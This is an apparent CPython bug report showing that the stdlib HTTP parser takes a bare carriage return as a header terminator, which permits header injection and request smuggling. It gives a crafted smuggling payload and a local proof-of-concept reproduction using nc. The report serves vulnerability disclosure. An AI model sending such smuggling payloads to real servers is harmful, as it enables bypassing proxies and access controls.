HTTP request smuggling via misinterpretation of bare CR as header field terminator
kenballus opened this issue · comments
Bug report
Bug description:
The stdlib HTTP parser treats \r
as equivalent to \r\n
when parsing header field lines. This means that, in the following payload, the Python HTTP parser will see two headers; Visible
and Smuggled
:
GET / HTTP/1.1\r\n
Visible: :/\rSmuggled: :)\r\n
\r\n
A standards-compliant HTTP server will either convert the bare \r
to a single space character, and therefore see only one header, or reject the message as invalid.
Unfortunately, some HTTP proxy servers don't do this translation, and simply allow bare \r
within header values. If a server using the CPython stdlib HTTP parser is deployed behind such a proxy, then it is vulnerable to header injection, and subsequent request smuggling.
To confirm the bug for yourself:
cat <<EOF > repro.py
from wsgiref.simple_server import make_server
def app(environ, start_response) -> list[bytes]:
response_body: bytes = b"".join(k.encode("latin1") + b": " + environ[k].encode("latin1") + b"\n" for k in environ if k.startswith("HTTP_"))
start_response(
"200 OK", [("Content-type", "application/json"), ("Content-Length", f"{len(response_body)}")]
)
return [response_body]
if __name__ == "__main__":
with make_server('127.0.0.1', 8000, app) as httpd:
httpd.default_request_version = "HTTP/1.1"
httpd.serve_forever()
EOF
python3 repro.py &>/dev/null &
printf 'GET / HTTP/1.1\r\nVisible: :/\rSmuggled: :)\r\n\r\n' | nc localhost 8000
You should see the following output, indicating that \r
was interpreted as a line ending:
HTTP/1.0 200 OK
Date: Wed, 31 Jan 2024 05:46:12 GMT
Server: WSGIServer/0.2 CPython/3.13.0a3+
Content-type: application/json
Content-Length: 35
HTTP_VISIBLE: :/
HTTP_SMUGGLED: :)
CPython versions tested on:
CPython main branch
Operating systems tested on:
Linux